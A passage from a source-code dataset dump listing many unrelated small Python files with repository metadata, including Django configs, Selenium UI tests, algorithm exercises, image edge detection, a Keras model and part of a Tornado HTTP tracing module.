        str = getVolumeState()
        print str
        sys.exit(stat)
except Exception, err:
    logger.error("Error inside get volume stat by controller", exc_info=True)
    print "STATUS UNKNOWN"
    sys.exit(3)
| [
"jean-louis@dupond.be"
] | jean-louis@dupond.be |
c2c55f13363e0c2423791f7715fdf6adfb225420 | ee51f91d1ee883fd84b36c10b97c3dcee8f6f7fa | /ProTwo/AppTwo/urls.py | fadd7f64a272d643b8bdc7edd804ab26c382fa4f | [
"MIT"
] | permissive | imrk97/Learning_django | 4d27e7d28266383d925b5da87fda39d6ec0ec277 | 6f19dc1c69846feda67cccc82269f0aa70f911bc | refs/heads/master | 2020-05-03T09:44:28.887089 | 2019-04-06T16:55:05 | 2019-04-06T16:55:05 | 178,562,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py |
from django.urls import path
from AppTwo import views
urlpatterns = [
path('',views.index,name='anything'),
#path('admin/', admin.site.urls),
] | [
"rohankarmakar97@gmail.com"
] | rohankarmakar97@gmail.com |
ddc08f166cdff4d09ae577eaf421b63c77c68970 | 2d3953d18f08b17851721a9622182f563295cb1d | /channelshowdown/userprofile/migrations/0012_auto_20180328_1645.py | d231a56f23499ecc5159b9980b39a53ed613e124 | [
"MIT"
] | permissive | channelfix/cshowdown-backend | b399a350755bbb9520103568a70ca1e2a1871397 | 4225ad4f2bd56112f627e6fe1f26c281484d804e | refs/heads/master | 2022-12-10T10:22:35.987518 | 2018-08-29T02:50:02 | 2018-08-29T02:50:02 | 122,010,350 | 0 | 0 | MIT | 2022-12-08T00:56:24 | 2018-02-19T02:19:02 | JavaScript | UTF-8 | Python | false | false | 501 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-03-28 16:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: make UserInfo.user_video optional (blank allowed, default None)."""

    dependencies = [
        ('userprofile', '0011_auto_20180328_1240'),
    ]

    operations = [
        migrations.AlterField(
            model_name='userinfo',
            name='user_video',
            field=models.FileField(blank=True, default=None, upload_to='profile_video/'),
        ),
    ]
| [
"arranbaleva@gmail.com"
] | arranbaleva@gmail.com |
57968c4b0079829bed20ff53911d5d768715b9fd | 7798c5171e4f63b40e9a2d9ae16f4e0f60855885 | /manage.py | b3a505230aac16ae6ce9859ed552d3f4d09d2d80 | [] | no_license | mstepniowski/wffplanner | d2d5ddd2938bd2b7b294332dad0d24fa63c2700a | 62d1d00ca9a546b759e5c394c7a9da06484a7aa3 | refs/heads/master | 2020-05-20T06:04:22.413395 | 2015-10-01T16:12:48 | 2015-10-01T16:12:48 | 6,033,243 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Point Django at the project's settings unless the caller already set it.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "wffplanner.settings")

    # Imported here so the settings variable is in place before Django loads.
    from django.core.management import execute_from_command_line

    execute_from_command_line(sys.argv)
| [
"marek@stepniowski.com"
] | marek@stepniowski.com |
76e2f983d191d20cb046d3673dce23b0cfb5febc | d3e265b206cc1ae7c13470e70248d397a10f3b57 | /selenium_codes/fp_changep-4.py | 539542c9d12f34b45ea30875df2a55b0c4b59f93 | [] | no_license | aishwar18/Profile-Builder | 2b30dbc2dd2808a45305c0fda5d5e7eb468b427d | 01e1260fe5392046404457f90176cb5214076231 | refs/heads/main | 2023-06-01T23:33:30.986554 | 2021-06-18T12:03:45 | 2021-06-18T12:03:45 | 340,952,643 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,690 | py | #forgot password change password having password mismatch
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait

# UI test: forgot-password flow where the new/confirm passwords deliberately
# do not match. Expects the app on localhost:8000 and chromedriver at PATH.
PATH="C:\Program Files (x86)\chromedriver.exe"
driver=webdriver.Chrome(PATH)
driver.maximize_window()
driver.get("http://127.0.0.1:8000/html/login")
try:
    # Step 1: open the forgot-password page from the login screen.
    link=driver.find_element_by_xpath("//a[contains(@href ,'/html/forgotPassword')]")
    time.sleep(2)
    print("clicked on the forgot password page")
    link.click()
    # Step 2: submit the account's username.
    username=driver.find_elements_by_name("username")
    time.sleep(2)
    username[0].send_keys("aditya")
    time.sleep(2)
    submit=driver.find_elements_by_xpath("//div[contains(@class ,'PR_button')]")
    time.sleep(2)
    submit[0].click()
    time.sleep(2)
    print("entered security question page")
    # Step 3: answer the security question.
    answer=driver.find_elements_by_name("answer")
    answer[0].send_keys("percy jackson")
    sub=driver.find_elements_by_xpath("//div[contains(@class ,'PR_button')]")
    time.sleep(2)
    sub[0].click()
    # Step 4: mismatched new/confirm passwords (the negative case under test).
    newp=driver.find_elements_by_name("newPassword")
    time.sleep(2)
    newp[0].send_keys("Qwerty11")
    confirmp=driver.find_elements_by_name("confirmPassword")
    time.sleep(2)
    confirmp[0].send_keys("Aditya11")
    sub=driver.find_elements_by_xpath("//div[contains(@class ,'PR_button')]")
    time.sleep(2)
    sub[0].click()
    time.sleep(4)
    driver.quit()
except Exception as e:
    # NOTE(review): message says "registration page" but this is the
    # forgot-password flow -- likely copy-pasted; confirm before trusting logs.
    print("exception found",format(e))
    print("failed to navigate to registration page")
    time.sleep(4)
    driver.quit()
| [
"noreply@github.com"
] | aishwar18.noreply@github.com |
78a434798c5ff1b702e86b60098a0df79508e712 | ecafb17f9b2cbd37fb223743f47ba130b0977914 | /pyesst/chapter5.py | effd23dae191ad2f0bdd8fbbec8ccc4e928f260f | [] | no_license | modevops/python_practice | 0088d322230932e3562f48edeadd87dd1f517332 | 67d2845df46e6815ac052ac935868cdd29ac681d | refs/heads/master | 2022-04-18T17:00:13.013226 | 2020-04-10T14:08:40 | 2020-04-10T14:08:40 | 254,648,456 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 207 | py | #!/usr/bin/env python3
# Copyright 2009-2017 BHG http://bw.org/
# Demonstrate the bitwise AND operator; operands and result echoed in hex.
x, y = 0x0a, 0x02
z = x & y
print('(hex) x is {:02x}, y is {:02x}, z is {:02x}'.format(x, y, z))
print(f'(bin) x is {x:08b}, y is {y:08b}, z is {z:08b}') | [
"modevops@Marcuss-MacBook-Pro.local"
] | modevops@Marcuss-MacBook-Pro.local |
db7a73788447c9b2c49c39cac65eef68a35a17fd | 131bd461db24a7a18397f0755019f50fdb938d51 | /Tugas/differensiasi numerik/selisih tengah.py | 8c2ae498e994e9f59552de1762925e3d755f1f90 | [] | no_license | sasaputra/MetodeNumerikGanjil-21-22 | f4ef309eee7c53a8adc21998f3a5df4c281b70d4 | f5be7d7857d2b182e4f597ce92d66a14c247a325 | refs/heads/main | 2023-08-13T03:52:49.782526 | 2021-10-15T01:27:48 | 2021-10-15T01:27:48 | 402,184,720 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | import numpy as np
import math
def f(x):
    """The function being differentiated: f(x) = e^(-x) * sin(2x) + 1."""
    return np.exp(-x) * math.sin(2 * x) + 1


def turunan(x0, h):
    """Approximate f'(x0) by the central-difference formula, halving the step
    until successive estimates differ by less than 1e-5.

    Bugs fixed relative to the original:
    - ``condition = true`` raised NameError (undefined lowercase ``true``).
    - The parameters ``x0`` and ``h`` were immediately overwritten with the
      hard-coded values 1 and 0.1; they are now honored (generalization).
    - Operator precedence: ``(f(x0+h) - f(x0-h)/2*h)`` is not the central
      difference; the correct form is ``(f(x0+h) - f(x0-h)) / (2*h)``.
    - The final estimate is now returned as well as printed.
    """
    tolerance = 0.00001
    err = 1000
    dfxold = 1000
    dfx = dfxold
    while err >= tolerance:
        # Central (second-order) difference quotient at step size h.
        dfx = (f(x0 + h) - f(x0 - h)) / (2 * h)
        err = abs(dfxold - dfx)
        dfxold = dfx
        h = h / 2
    print("the center derivative at x= with specifed accuracy is")
    print(dfx)
    return dfx
| [
"noreply@github.com"
] | sasaputra.noreply@github.com |
f33cadde9c67f29e40284675b8066ac3dd49004f | 521b0719fa42009207b5080b4a3b075c8ff157a0 | /application/species/forms.py | 81c194b9c071a55385f8039849440c9a5e97e565 | [] | no_license | teemuoksanen/lintuhavainnot | 41e0e970e5a534374777926fb055640f2a6351a9 | 170fc08f07e724f3caa85de7b7df72ad200b995c | refs/heads/master | 2022-10-04T15:49:16.288249 | 2020-06-08T13:01:07 | 2020-06-08T13:01:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,360 | py | from flask_wtf import FlaskForm
from wtforms import StringField, TextAreaField, SelectField, validators
conservChoices = [(1, "Elinvoimainen"), (2, "Silmälläpidettävä"),
(3, "Vaarantunut"), (4, "Erittäin uhanalainen"), (5, "Äärimmäisen uhanalainen")]
class SpeciesCreationForm(FlaskForm):
    """Form for adding a new species (Finnish UI labels and validation messages)."""

    name = StringField("Lajinimi, kansakielinen:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
    species = StringField("Lajinimi, tieteellinen kaksiosainen:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
    sp_genus = StringField("Suku:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
    sp_family = StringField("Heimo:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
    sp_order = StringField("Lahko:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
    conserv_status = SelectField("Uhanalaisuusluokitus:", choices=conservChoices, coerce=int)
    info = TextAreaField("Lajikuvaus:", render_kw={"rows": 10, "cols": 30})

    class Meta:
        # NOTE(review): CSRF protection disabled for this form -- confirm intentional.
        csrf = False
class SpeciesEditForm(SpeciesCreationForm):
    """Form for editing an existing species.

    CONSISTENCY FIX: this class was a byte-for-byte copy of
    SpeciesCreationForm.  Inheriting from it removes the duplication while
    keeping the identical field set and Meta options (WTForms fields and the
    Meta class are inherited by subclasses).
    """
    pass
class SearchSpecies(FlaskForm):
    """Search form: pick a field, an optional search word, and an optional
    conservation-status filter."""
    # Searchable columns (db column name, Finnish label); "all" means every field.
    fieldChoices = [("all", "Kaikki kentät"), ("name", "Lajinimi"),
    ("species", "Tieteellinen nimi"), ("sp_genus", "Suku"), ("sp_family", "Heimo"),
    ("sp_order", "Lahko"), ("info", "Lajikuvaus")]
    # Same statuses as conservChoices plus "0" = no status filtering.
    conservChoices2 = [("0", "Älä rajaa uhanalaisuuden perusteella"), ("1", "Elinvoimainen"),
    ("2", "Silmälläpidettävä"), ("3", "Vaarantunut"), ("4", "Erittäin uhanalainen"),
    ("5", "Äärimmäisen uhanalainen")]
    column = SelectField("Minkä kentän perusteella haetaan?", choices = fieldChoices)
    searchword = StringField("Hakusana (jätä tyhjäksi, jos et halua hakea hakusanan perusteella):", [validators.Length(max=255, message="Kentän tulee olla enintään %(max)d merkkiä pitkä.")])
    conservStatus = SelectField("Uhanalaisuusluokitus:", choices=conservChoices2)
    class Meta:
        # CSRF protection is disabled for this form.
        csrf = False
| [
"sonja.t.heikkinen@hotmail.com"
] | sonja.t.heikkinen@hotmail.com |
945d9d0dbf297f3e00334a032fd8cd7922a9654e | 6cd87462fd9b5ee575aee281f6d2e4be5391ea92 | /apps/twitter/admin.py | f4524da329c2671ab002a1df4a319053a229dfa3 | [] | no_license | mo-mughrabi/djsocial | 912413574fd7ce943387dbd5744f05ec8ca57f48 | 060c0a8e0db848879dfaeb4c6f44f1dba7a39aea | refs/heads/master | 2016-09-16T10:46:05.853935 | 2014-03-13T19:14:41 | 2014-03-13T19:14:41 | 16,213,862 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | # -*- coding: utf-8 -*-
from django.contrib import admin
from models import Twitter, ScheduleOrder, Order
class TwitterAdmin(admin.ModelAdmin):
    """Admin list columns for Twitter accounts."""
    list_display = ('user', 'tid', 'screen_name','followers_sum', 'following_sum')
# Register the model together with its admin options.
admin.site.register(Twitter, TwitterAdmin)
class ScheduleOrderAdmin(admin.ModelAdmin):
    """Admin list columns for scheduled orders."""
    list_display = ('user', 'label', 'status','created_at', 'last_run')
admin.site.register(ScheduleOrder, ScheduleOrderAdmin)
class OrderAdmin(admin.ModelAdmin):
    """Admin list columns for individual orders."""
    list_display = ('user', 'schedule_order', 'status','created_at', 'executed_at')
admin.site.register(Order, OrderAdmin) | [
"="
] | = |
1a0e819271efbd2f4c12221045d0550048b59bcb | abee40ec5a102a045ac90c8f539868f328d3bc95 | /3-chapter/maitreD'.py | 9f602684cc9512b408afa533ae09edb41c6c7fd0 | [] | no_license | annabalan/pythonFAB | 4ac3ef3d90c98bf939593fd4b0d4dc8fea6d07a0 | 659646c0be2e5a97242cdb1b59942699095177e4 | refs/heads/master | 2021-01-21T16:04:19.025196 | 2018-06-05T05:35:47 | 2018-06-05T05:35:47 | 95,396,861 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | # Maitre D'
# Demonstrates interpreting any value as a condition (True or False)
print("Welcome to the Chateau D' Food")
print("It seems we are quite full this evening.\n")
# int() raises ValueError on non-numeric input; intentionally unhandled here.
money = int(input("How many dollars do you slip the Maitre D'? "))
# Any non-zero int is truthy, so tipping 0 dollars takes the else branch.
if money:
    print("Ah, I am reminded of a table, Right this way.")
else:
    print("Please, sit. It may be a while.")
input("\n\nPress the enter key to exit.")
| [
"colnyshkasmile@gmail.com"
] | colnyshkasmile@gmail.com |
4a2d4fecf255307e71b25519413f146f1bdacfd9 | 56b36ddf920b5f43e922cb84e8f420f1ad91a889 | /Leetcode/Leetcode - Premium/Mock Interview/isSubsequence.py | 053496e29b0e65f9a467defbd48dcafc83eb967e | [] | no_license | chithien0909/Competitive-Programming | 9ede2072e85d696ccf143118b17638bef9fdc07c | 1262024a99b34547a3556c54427b86b243594e3c | refs/heads/master | 2022-07-23T16:47:16.566430 | 2020-05-12T08:44:30 | 2020-05-12T08:44:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,279 | py | """
Given a string s and a string t, check if s is subsequence of t.
You may assume that there is only lower case English letters in both s and t. t is potentially a very long (length ~= 500,000) string, and s is a short string (<=100).
A subsequence of a string is a new string which is formed from the original string by deleting some (can be none) of the characters without disturbing the relative positions of the remaining characters. (ie, "ace" is a subsequence of "abcde" while "aec" is not).
Example 1:
s = "abc", t = "ahbgdc"
Return true.
Example 2:
s = "axc", t = "ahbgdc"
Return false.
Follow up:
If there are lots of incoming S, say S1, S2, ... , Sk where k >= 1B, and you want to check one by one to see if T has its subsequence. In this scenario, how would you change your code?
Credits:
Special thanks to @pbrother for adding this problem and creating all test cases.
"""
class Solution:
    def isSubsequence(self, s: str, t: str) -> bool:
        """Return True if s is a subsequence of t.

        Two-pointer scan over t, O(len(t)) time / O(1) space.
        """
        if len(s) == 0: return True
        curS, curT = 0, 0
        while curT <= len(t) - 1:
            if s[curS] == t[curT]:
                curS += 1
                if curS == len(s):
                    # Every character of s was matched in order.
                    return True
            curT += 1
        # BUG FIX: the original `return curS == l` raised NameError (`l` is
        # undefined) whenever s was not fully matched.  Reaching this point
        # means curS < len(s), so s is not a subsequence of t.
        return False
# Ad-hoc smoke test; the print below should show True for the first example.
s = Solution()
print(s.isSubsequence("abc","ahbgdc")) | [
"ntle1@pipeline.sbcc.edu"
] | ntle1@pipeline.sbcc.edu |
62b02423e22f441caad82e24c1757d28909767d9 | 73dd4cd6e08c09242e5a486dce03ef37a1160e83 | /create_general_model5.py | bd4f7500a188c675303ae43b1f0875fb7006b9a6 | [] | no_license | zhangfeiyang/mm-trigger2 | 8d429344bbfdf01bd278eb426117b55650c2ec5e | 2b99cc03a61c828a0f0ed7c6298e4074af5462e0 | refs/heads/master | 2020-06-02T13:56:38.789337 | 2019-06-11T14:09:41 | 2019-06-11T14:09:41 | 191,178,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,068 | py | #!/usr/bin/python3
import tensorflow as tf
from tensorflow import keras
# Helper libraries
import numpy as np
#import matplotlib.pyplot as plt
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Dense, Input, Concatenate, Lambda
from tensorflow.keras import optimizers
from tensorflow.python.framework import ops
from tensorflow.keras.layers import Activation
from tensorflow.keras import backend as K
from tensorflow.keras import backend as K
def custom_activation(x):
    """Exponential activation used by the second hidden layer of the model."""
    #return K.sigmoid(x)
    return K.exp(x)
def create_model():
    """Build the 325-feature -> 2-class softmax classifier.

    Same architecture as before, assembled with Sequential.add() instead of
    a layer-list constructor argument.
    """
    model = keras.Sequential()
    model.add(keras.layers.Flatten(input_shape=(325, )))
    model.add(keras.layers.Dense(100, activation=tf.nn.relu))
    model.add(keras.layers.Dense(100, activation=custom_activation))
    model.add(keras.layers.Dense(50, activation=tf.nn.softsign))
    model.add(keras.layers.Dense(10, activation=tf.nn.relu))
    model.add(keras.layers.Dense(2, activation=tf.nn.softmax))
    return model
# Print the layer summary when run as a script.
if __name__ == "__main__":
    model = create_model()
    model.summary()
| [
"1173205582@qq.com"
] | 1173205582@qq.com |
b28d0abd6a484e23c277ddb74ecf8140c4ca1fe5 | 1bdf38834c22b0100595cb22f2862fd1ba0bc1e7 | /code308RangeSumQuery2DMutable.py | f914f056042314c3f89d84a5b8ddf3bfe388b092 | [] | no_license | cybelewang/leetcode-python | 48d91c728856ff577f1ccba5a5340485414d6c6e | 635af6e22aa8eef8e7920a585d43a45a891a8157 | refs/heads/master | 2023-01-04T11:28:19.757123 | 2020-10-29T05:55:35 | 2020-10-29T05:55:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,454 | py | """
308. Range Sum Query 2D - Mutable
Given a 2D matrix matrix, find the sum of the elements inside the rectangle defined by its upper left corner (row1, col1) and lower right corner (row2, col2).
The above rectangle (with the red border) is defined by (row1, col1) = (2, 1) and (row2, col2) = (4, 3), which contains sum = 8.
Example:
Given matrix = [
[3, 0, 1, 4, 2],
[5, 6, 3, 2, 1],
[1, 2, 0, 1, 5],
[4, 1, 0, 1, 7],
[1, 0, 3, 0, 5]
]
sumRegion(2, 1, 4, 3) -> 8
update(3, 2, 2)
sumRegion(2, 1, 4, 3) -> 10
Note:
The matrix is only modifiable by the update function.
You may assume the number of calls to update and sumRegion function is distributed evenly.
You may assume that row1 ≤ row2 and col1 ≤ col2.
"""
"""
Similar problem: 304 Range Sum Query 2D - Immutable
Use Binary Index Tree (BIT) to quickly get the sum of the rectangle area from (0, 0) to (row, col), inclusive
"""
import unittest
class NumMatrix:
    """Mutable 2-D range-sum structure backed by a 2-D Binary Indexed Tree.

    ``mat`` mirrors the current cell values (needed to compute update deltas)
    and ``bit`` is the (M+1) x (N+1) Fenwick tree using 1-based indices.
    """
    def __init__(self, matrix):
        self.M = len(matrix)
        self.N = len(matrix[0]) if self.M > 0 else 0
        # Current cell values, all zero until seeded below.
        self.mat = [[0] * self.N for _ in range(self.M)]
        # 1-based 2-D Fenwick tree.
        self.bit = [[0] * (self.N + 1) for _ in range(self.M + 1)]
        # Seed the tree by applying every initial value as a point update.
        for r, row_vals in enumerate(matrix):
            for c, cell in enumerate(row_vals):
                self.update(r, c, cell)
    def update(self, row: int, col: int, val: int) -> None:
        """Set matrix[row][col] = val; out-of-range coordinates are ignored."""
        if not (0 <= row < self.M and 0 <= col < self.N):
            return
        delta = val - self.mat[row][col]
        self.mat[row][col] = val
        r = row + 1  # switch to the tree's 1-based indexing
        while r <= self.M:
            c = col + 1  # restart the column walk for every tree row
            while c <= self.N:
                self.bit[r][c] += delta
                c += c & (-c)
            r += r & (-r)
    def getSum(self, row: int, col: int) -> int:
        """Sum of the rectangle [0, row) x [0, col) (both ends exclusive)."""
        total = 0
        if 1 <= row <= self.M and 1 <= col <= self.N:
            r = row
            while r > 0:
                c = col
                while c > 0:
                    total += self.bit[r][c]
                    c -= c & (-c)
                r -= r & (-r)
        return total
    def sumRegion(self, row1: int, col1: int, row2: int, col2: int) -> int:
        """Inclusive rectangle sum via inclusion-exclusion of four prefixes."""
        whole = self.getSum(row2 + 1, col2 + 1)
        left = self.getSum(row2 + 1, col1)
        above = self.getSum(row1, col2 + 1)
        corner = self.getSum(row1, col1)
        return whole - left - above + corner
# Your NumMatrix object will be instantiated and called as such:
# obj = NumMatrix(matrix)
# obj.update(row,col,val)
# param_2 = obj.sumRegion(row1,col1,row2,col2)
class Test(unittest.TestCase):
    """Exercises NumMatrix with the example from the problem statement."""
    def test_1(self):
        matrix = [[3, 0, 1, 4, 2],\
                  [5, 6, 3, 2, 1],\
                  [1, 2, 0, 1, 5],\
                  [4, 1, 0, 1, 7],\
                  [1, 0, 3, 0, 5]]
        #matrix = [[3, 0], [5, 6]]
        m = NumMatrix(matrix)
        # Exclusive 2x2 prefix: 3 + 0 + 5 + 6.
        self.assertEqual(14, m.getSum(2, 2))
        self.assertEqual(8, m.sumRegion(2, 1, 4, 3))
        m.update(3, 2, 2)
        self.assertEqual(10, m.sumRegion(2, 1, 4, 3))
if __name__ == "__main__":
unittest.main(exit = False) | [
"guoligit@gmail.com"
] | guoligit@gmail.com |
cf7b634e86403bc6e74ea6701c60c1c423198ef8 | c29d81a381a70be0fbaf10e94bdf6f57f7a1ba21 | /lab3.py | 1a421553cb7bae7eb6cacd819f7ac2d85a39e50c | [] | no_license | veefore/avip | 2b27ccca8ad4923318b7d9ad1f58e756306f33cf | 94c3ff30c2589829b4854442f40bedeba8ce32fc | refs/heads/master | 2021-01-13T23:53:27.597427 | 2020-06-06T03:32:21 | 2020-06-06T03:32:21 | 242,532,873 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,399 | py | from PIL import Image
import numpy as np
from utils import print_timing
from lab1 import greyscale
def aperture_to_array(pixels, x, y, a):
    """Copy an a-by-a pixel window into a float ndarray.

    (x, y) is the top-left corner of the window, with (0, 0) at the
    top-left of the image; `a` is the side length of the window.
    """
    return np.array(
        [[int(pixels[x + dx, y + dy]) for dy in range(a)] for dx in range(a)],
        dtype=float,
    )
@print_timing
def calculate_gradients(image):
    """Compute 5x5 edge-mask gradients (Gx, Gy, |Gx|+|Gy|) of a PIL image.

    The output arrays are 4 elements smaller per axis because the 5x5
    aperture cannot be centred on the border pixels.
    """
    # Horizontal-edge mask: -1 row on top, +1 row on the bottom.
    Gx_mask = np.array([[-1, -1, -1, -1, -1],
                        [0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0],
                        [1, 1, 1, 1, 1]])
    # The second mask is the first rotated by 90 degrees.
    Gy_mask = np.rot90(Gx_mask, 1)
    size0 = image.size[0] - 4
    size1 = image.size[1] - 4
    Gx = np.empty((size0, size1), dtype=int)
    Gy = np.empty((size0, size1), dtype=int)
    G = np.empty((size0, size1), dtype=int)
    pixels = image.load()
    for h in range(size0):
        for w in range(size1):
            arr = aperture_to_array(pixels, h, w, 5)
            Gx[h][w] = np.sum(np.multiply(Gx_mask, arr))
            Gy[h][w] = np.sum(np.multiply(Gy_mask, arr))
            # Manhattan approximation of the gradient magnitude.
            G[h][w] = abs(Gx[h][w]) + abs(Gy[h][w])
    return (Gx, Gy, G)
def binarize(G, size, threshold):
    """Threshold gradient magnitudes G into a 1-bit PIL image of *size*.

    Only the top-left (size[0]-4) x (size[1]-4) region is written, matching
    the shrunken gradient arrays produced by calculate_gradients.
    """
    result = Image.new('1', size)
    px = result.load()
    for row in range(size[0] - 4):
        for col in range(size[1] - 4):
            px[row, col] = 1 if G[row][col] > threshold else 0
    return result
def normalize(array):
    """Linearly rescale *array* into the 0-255 range, in place, and return it.

    PERFORMANCE: replaces the original per-element Python loops with a single
    vectorized numpy expression (same values; for integer arrays the slice
    assignment truncates exactly like the original per-cell assignment).
    NOTE: assumes the array is not constant (max > min), as before.
    """
    low = array.min()
    span = abs(array.max() - low)
    array[:] = (array - low) * 255 / span
    return array
def array_to_image(array):
    """Convert a 2-D numeric array into an 8-bit greyscale PIL image.

    CLEANUP: removed a leftover `print(array)` debug statement that dumped
    every array to stdout.
    """
    image = Image.new('L', array.shape)
    pixels = image.load()
    for h in range(array.shape[0]):
        for w in range(array.shape[1]):
            pixels[h, w] = int(array[h][w])
    return image
def grads_to_images(grads):
    """Normalize the three gradient maps and render each as a greyscale image."""
    return [array_to_image(normalize(grads[i])) for i in range(3)]
@print_timing
def outline(image, image_name, threshold, folder_path=None):
    """Edge-detect *image* and return the thresholded 1-bit outline image.

    When folder_path is given, the intermediate Gx/Gy/G gradient images are
    also saved there with prefixed file names.
    """
    grads = calculate_gradients(image)
    grad_images = grads_to_images(grads)
    if folder_path is not None:
        grad_images[0].save(folder_path + "Gx_" + image_name)
        grad_images[1].save(folder_path + "Gy_" + image_name)
        grad_images[2].save(folder_path + "G_" + image_name)
    return binarize(grads[2], image.size, threshold)
def process_image(image_name, threshold, folder_path=None, save=False):
    """Greyscale, outline and save one image located under *folder_path*.

    NOTE(review): the folder_path=None default is unusable -- the string
    concatenations below raise TypeError unless a path is supplied.
    """
    img = Image.open(folder_path + image_name)
    greyscale_img = greyscale(img)
    if save:
        # Optionally keep the intermediate greyscale version too.
        greyscale_img.save(folder_path + "greyscale_" + image_name)
    outline(greyscale_img, image_name, threshold, folder_path).save(folder_path + "outlined_" + image_name)
def run_test():
    """Process the four lab sample images with hand-tuned thresholds."""
    folder_path = "Data/lab3/"
    process_image("img1.bmp", 63, folder_path)
    process_image("img2.bmp", 115, folder_path)
    process_image("img3.bmp", 75, folder_path)
    process_image("img4.bmp", 65, folder_path)
#run_test()
| [
"veefore.vs@gmail.com"
] | veefore.vs@gmail.com |
49a3f9e0115ecea2e26d292e39f1d033e9789868 | 9db35c7fee8844d1cc2cdc27898cbdb2bd643fb5 | /main.py | b2e3504df196ddeb9ef36cf595c2dd946ac2ed23 | [] | no_license | UNILORN/SeleniumSample | 1bffca3055f08654872202d131d20bc7d311dac8 | fbb8583d06b053b932c6fe200bbf78ee0a8729f4 | refs/heads/master | 2020-06-02T19:54:33.757503 | 2019-06-11T03:47:36 | 2019-06-11T03:47:36 | 191,289,454 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 784 | py | from selenium import webdriver
import os
from os.path import abspath,dirname
from random import randrange
from time import sleep
# Pick the bundled chromedriver for the current platform and open the
# login page, pre-filling the credentials.
if os.name == 'posix':
    path = abspath(dirname(__file__)+'./mac/chromedriver')
else:
    # BUG FIX: raw string -- '\w' and '\c' are invalid escape sequences in a
    # plain literal (they only keep working via a deprecated fallback that
    # will become a SyntaxError).  The resulting value is unchanged.
    path = abspath(dirname(__file__)+r'\win\chromedriver.exe')
browser = webdriver.Chrome(executable_path=path)
browser.get('https://www1.shalom-house.jp/komon/')
browser.implicitly_wait(3)
el = browser.find_element_by_id('txtID')
# SECURITY NOTE(review): hard-coded login ID (and an empty password below);
# credentials should be moved out of source control.
el.send_keys('testtest')
el = browser.find_element_by_id('txtPsw')
el.send_keys('')
# el = browser.find_element_by_id('btnLogin')
# el.click()
# el = browser.find_element_by_id('ctl00_ContentPlaceHolder1_imgBtnSyuugyou')
# el.click()
# el = browser.find_element_by_id('ctl00_ContentPlaceHolder1_ibtnIn3')
# el.click()
# browser.close() | [
"yusuke.aoki@optim.co.jp"
] | yusuke.aoki@optim.co.jp |
34443723d6fcf2aed884d9aa89f7d0734540bf52 | 05a95cde87ae2d1f33b0886b36625684fcdb635e | /epsagon/events/tornado_client.py | f036e51142ed80e8285b9ffe24bad4b5b93576a9 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | epsagon/epsagon-python | eba6feae2ee04d1ee66e08b0b6eedf9473ba9058 | 91e28fe43bc4f42152fb156145088cb8c9f69b85 | refs/heads/master | 2023-05-24T05:38:40.625407 | 2022-11-10T12:34:50 | 2022-11-10T12:34:50 | 150,960,938 | 57 | 25 | MIT | 2023-05-12T22:38:08 | 2018-09-30T11:21:41 | Python | UTF-8 | Python | false | false | 4,790 | py | """
Tornado AsyncHTTPClient events module.
"""
from __future__ import absolute_import
import functools
try:
from urllib.parse import urlparse, urlunparse
except ImportError:
from urlparse import urlparse, urlunparse
import traceback
from uuid import uuid4
from epsagon.utils import add_data_if_needed
from ..trace import trace_factory
from ..event import BaseEvent
from ..http_filters import (
is_blacklisted_url,
is_payload_collection_blacklisted
)
from ..utils import update_http_headers, normalize_http_url
from ..constants import HTTP_ERR_CODE, EPSAGON_HEADER_TITLE
class TornadoAsyncHTTPClientEvent(BaseEvent):
    """
    Represents base request event.
    """
    ORIGIN = 'tornado_client'
    RESOURCE_TYPE = 'http'
    # pylint: disable=W0613
    def __init__(self, wrapped, instance, args, kwargs, start_time, response,
                 exception):
        """
        Initialize.
        :param wrapped: wrapt's wrapped
        :param instance: wrapt's instance
        :param args: wrapt's args
        :param kwargs: wrapt's kwargs
        :param start_time: Start timestamp (epoch)
        :param response: response data
        :param exception: Exception (if happened)
        """
        super(TornadoAsyncHTTPClientEvent, self).__init__(start_time)
        self.event_id = 'tornado-client-{}'.format(str(uuid4()))
        # args[0] is the outgoing HTTP request object.
        request = args[0]
        headers = dict(request.headers)
        if headers:
            # Make sure trace ID is present in case headers will be removed.
            epsagon_trace_id = headers.get(EPSAGON_HEADER_TITLE)
            if epsagon_trace_id:
                self.resource['metadata']['http_trace_id'] = epsagon_trace_id
        # Rebuild the URL with the port stripped from the netloc; this
        # variant is used only for the payload-blacklist checks below.
        parsed_url = urlparse(request.url)
        host_url = parsed_url.netloc.split(':')[0]
        full_url = urlunparse((
            parsed_url.scheme,
            host_url,
            parsed_url.path,
            parsed_url.params,
            parsed_url.query,
